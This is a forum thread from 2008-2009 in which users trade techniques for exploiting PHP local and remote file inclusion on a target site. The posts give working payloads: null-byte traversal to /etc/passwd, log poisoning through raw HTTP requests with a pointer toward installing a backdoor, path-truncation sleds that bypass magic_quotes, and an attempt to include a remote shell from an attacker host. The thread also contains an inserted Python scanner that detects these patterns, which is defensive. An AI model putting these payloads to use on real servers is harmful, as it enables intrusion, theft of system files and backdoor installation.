REMOTE FILE INCLUDE
Posted by: Chuks
Date: December 22, 2008 07:42AM

Hi guys. Merry X-mas.

There is this site that has inclusion vulnerabilities that I am supposed to pentest, and whenever I try to include a shell, I get this error.

Warning: Failed opening 'pages/http://www.attackingsite.com/chuksjonia/tools/shells/shell.txt?.htm' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/victim/pages/index.php on line 86

I'm still trying to see what could be blocking me, but some help from the professionals wouldn't hurt.

Nice Holidays.


/Chuks

Re: REMOTE FILE INCLUDE
Posted by: ebo
Date: December 24, 2008 03:45AM

Hi Chuks,

The "pages/" prefix won't let you include a remote file. Here you can only include local files. Try ../../../../../etc/passwd%00

Re: REMOTE FILE INCLUDE
Posted by: barbarianbob
Date: December 24, 2008 02:04PM

If you know where the access.log or error.log file is and you can write your own HTTP headers, you can get yourself an RFI via LFI:

define('CRLF', "\r\n"); // CRLF is not a built-in PHP constant, so it has to be defined first
$handle=fsockopen('victim.com',80);
$headers='';
$headers.='GET /?<?php phpinfo();?> HTTP/1.1'.CRLF;
$headers.='host: victim.com'.CRLF;
$headers.='connection: close'.CRLF.CRLF;
fwrite($handle,$headers);
fclose($handle);

Then visit:
victim.com/?injectionFile=../../logs/access.log%00

You need to do the headers through HTTP because browsers encode them before sending.
From there, change around the code a bit until you can install a backdoor. But test the code on your localhost beforehand, because once you make a typo, php will spit out fatal errors and won't execute later injections.

Re: REMOTE FILE INCLUDE
Posted by: Chuks
Date: December 24, 2008 03:01PM

LFI attempt gives this error.

Warning: Failed opening 'pages/../../../../../etc/passwd\0.htm' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/victim/pages/index.php on line 86

Hi barbarianbob. I have no idea how I can do the access log, but that is a good idea; I should research that. In case you have an article or a small video, please forward it as an Xmas gift; I will highly appreciate it.

Re: REMOTE FILE INCLUDE
Posted by: PaPPy
Date: December 24, 2008 04:28PM

When doing an LFI, remember to use a null character like %00 or %0A
to drop the trailing characters.

http://www.xssed.com/archive/author=PaPPy/

Re: REMOTE FILE INCLUDE
Posted by: barbarianbob
Date: December 24, 2008 09:29PM

@PaPPy: %0A doesn't seem to work for me. I tested through every character on a Windows and a *nix box. Both only allow %00 when running the following code:
for($a=0;$a<256;$a+=1){ // try every byte value as a terminator
  include('someFile.php'.chr($a).'.html');
}
Anything I'm missing?


@Chuks: The problem is the server is slashing the null byte. The server either has magic_quotes turned on or it's running addslashes() on your input. I did some testing, and the bypasses I found seem to be different based on the OS. For Windows, trail your file with a sled of periods. For *nix (which you're attacking) use a sled of slashes.

And by sled, I mean 4KB worth.

So, to hack the box, try what this evals to:
$url='http://victim.com/?injectFile=../../../../../../etc/passwd'.str_repeat('/',4096);


My test code to check which char sled works:
for($a=0;$a<256;$a+=1){
  $sled=str_repeat(chr($a),4096);
  @include('someFileThatExists.php'.$sled.'.html');
}
// Windows allows chars 0,32,34,46,60,62
// *nix allows chars 0,47

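As an added, defender-side example (not code from this thread), a small Python log scanner that flags the request patterns barbarianbob describes in his posts above: traversal with %00, the 4 KB slash or period sled used when magic_quotes escapes the null byte, PHP tags planted through raw HTTP requests to poison access.log, and attempts to include the log back. The log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed Apache log lines (not real traffic) covering the techniques in
# this thread: traversal plus %00, a 4096-byte slash sled, a PHP tag planted
# in the request line to poison the access log, and an include of that log.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Dec/2008:15:01:00 +0000] "GET /?page_link=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Dec/2008:15:02:10 +0000] "GET /?page_link=../../../../../etc/passwd%00 HTTP/1.1" 200 87',
    '10.0.0.9 - - [24/Dec/2008:15:03:22 +0000] "GET /?page_link=../../../../../../etc/passwd'
    + '/' * 4096 + ' HTTP/1.1" 200 1200',
    '10.0.0.9 - - [24/Dec/2008:15:04:40 +0000] "GET /?<?php phpinfo();?> HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Dec/2008:15:05:01 +0000] "GET /?page_link=../../logs/access.log%00 HTTP/1.1" 200 98',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+')
# A long run of '/', '.', or '/.' is the sled that pushes the appended '.htm'
# past the path length limit when %00 is neutralised by magic_quotes.
SLED_RE = re.compile(r'/{256,}|\.{256,}|(?:/\.){128,}')

def classify(request):
    """Return the set of LFI indicators found in one (possibly URL-encoded) request."""
    decoded = unquote(request)
    findings = set()
    if '../' in decoded or '..\\' in decoded:
        findings.add('traversal')
    if '\x00' in decoded:                       # %00 terminator
        findings.add('null_byte')
    if SLED_RE.search(decoded):
        findings.add('path_sled')
    if re.search(r'<\?(php|=)', decoded, re.IGNORECASE):
        findings.add('php_tag')                 # log poisoning attempt
    if re.search(r'(access|error)[_.]log', decoded, re.IGNORECASE):
        findings.add('log_file_target')         # reading the poisoned log back
    return findings

def scan(lines):
    """Return (ip, request prefix, sorted findings) for each suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m.group('request'))
        if findings:
            hits.append((m.group('ip'), m.group('request')[:60], sorted(findings)))
    return hits
```

Run scan() over a real access log to get one tuple per request that carries any of these indicators; the benign first sample line produces no hit.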
Re: REMOTE FILE INCLUDE
Posted by: barbarianbob
Date: December 24, 2008 10:17PM

Also, a quick write-up of how to use the access log to RFI:
http://reco.rd13.net/bullpoop/lfi2rfi.html

Re: REMOTE FILE INCLUDE
Posted by: Chuks
Date: December 24, 2008 11:56PM

Thanks so much for all your help and input. I tried page_link=../../../../../../etc/passwd'.str_repeat('/',4096); and I get an error which looks like this.

Warning: Failed opening 'pages/../../../../../../etc/passwd\'.str_repeat(\'/\',4096);.htm' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/victim/pages/index.php on line 86.

Yes, magic_quotes is turned on on this one. Is there a way I can make it initiate a download of the file without showing it in the site source or page?

Let me read up on the access log RFI.

Re: REMOTE FILE INCLUDE
Posted by: barbarianbob
Date: December 25, 2008 06:35PM

No, you have to evaluate that code. As in fill the url in with 4096 slashes.
hxxp://victim.com/?injectFile=../../../../../../etc/passwd/////////////////////...etc

Re: REMOTE FILE INCLUDE
Posted by: Chuks
Date: December 26, 2008 04:38AM

At a point it read my own passwd file, file:////////////////////etc/passwd

So I went on, and still the error rolls out.

Re: REMOTE FILE INCLUDE
Posted by: barbarianbob
Date: December 26, 2008 02:15PM

See if you can use that method to include a file that you know exists.

Example:
pages/home.html exists.
?injectionFile=../pages/home.html////////////etc



Edited 1 time(s). Last edit at 12/26/2008 02:26PM by barbarianbob.

Re: REMOTE FILE INCLUDE
Posted by: Spikeman
Date: January 09, 2009 10:46PM

I'm exploiting a site with a similar LFI vulnerability. Magic_quotes is on, so it escapes the null byte. I attempted the sled method, but the include isn't loaded and the rest of the page isn't loaded either. Is there any way around this?

Re: REMOTE FILE INCLUDE
Posted by: barbarianbob
Date: January 09, 2009 11:12PM

Do you know the site's operating system?
Any errors show up? If so, does it use include() or require()?
Can you confirm there's a file where you're pointing your inclusion?
Does the site use open-source code?

The best way to get a feel of it is to test it out on your localhost.
See if you can LFI something like the following:
<?php
$id=$_GET['id'];
if(!get_magic_quotes_gpc())$id=addslashes($id); // emulate magic quotes when they are off
require $id.'.html';
?>

Re: REMOTE FILE INCLUDE
Posted by: ascii
Date: February 08, 2009 05:11AM

We released an article that features a deeper analysis of this bug plus some extra juice.

PHP filesystem attack vectors (Path normalization and truncation issues)
http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/

Hope you'll enjoy!
ascii
ush.it

Re: REMOTE FILE INCLUDE
Posted by: ebo
Date: February 08, 2009 10:39AM

Excellent!

I worked on it too, but I failed to exploit.
Do you know if PHP will provide a patch?

Unfortunately, your attack doesn't seem to work if the include string begins with a slash.
Consider these scripts:

<?php
$var = "aze/../../../../../etc/passwd" . str_repeat("/.",3000) . ".txt"; // relative path followed by a "/." sled
include($var);
?>
Works perfectly.

<?php
$var = "/aze/../../../../../etc/passwd" . str_repeat("/.",3000) . ".txt"; // same sled, but the path starts with a slash
include($var);
?>
Doesn't work.

The system calls differ, fstat64 instead of lstat64. Do you know why?

Thanks



Edited 1 time(s). Last edit at 02/08/2009 12:04PM by ebo.

Re: REMOTE FILE INCLUDE
Posted by: rvdh
Date: February 09, 2009 08:43PM

That's regular *NIX behavior by the way, you can blame Apache not PHP for that.
